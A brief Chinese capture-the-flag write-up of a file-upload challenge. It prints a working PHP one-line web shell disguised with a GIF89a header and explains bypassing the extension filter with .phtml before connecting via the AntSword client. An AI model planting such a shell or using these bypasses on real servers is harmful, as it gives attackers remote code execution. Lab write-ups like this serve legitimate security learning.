该题为上传木马题
进入题目后,上传一句话木马
出现如下界面,说明木马不能含有”<?”字符
因为现在不会写一句话木马,则上网搜不含“<?”的木马
得到
1 | GIF89a? <script language="php">eval($_REQUEST[1])</script> |
新建php文档,将代码输入其中,并抓包,修改格式,上传。
上传失败
绕过后缀的有文件格式有php,php3,php4,php5,phtml,pht,但php,pht被ban了,php345也不行的都不行,则用phtml
上传后
打开蚁剑连接后发生错误,猜测是中文名字的原因,换成英文名,猜测上传后的文件在upload
链接成功
最后在根目录下得到flag
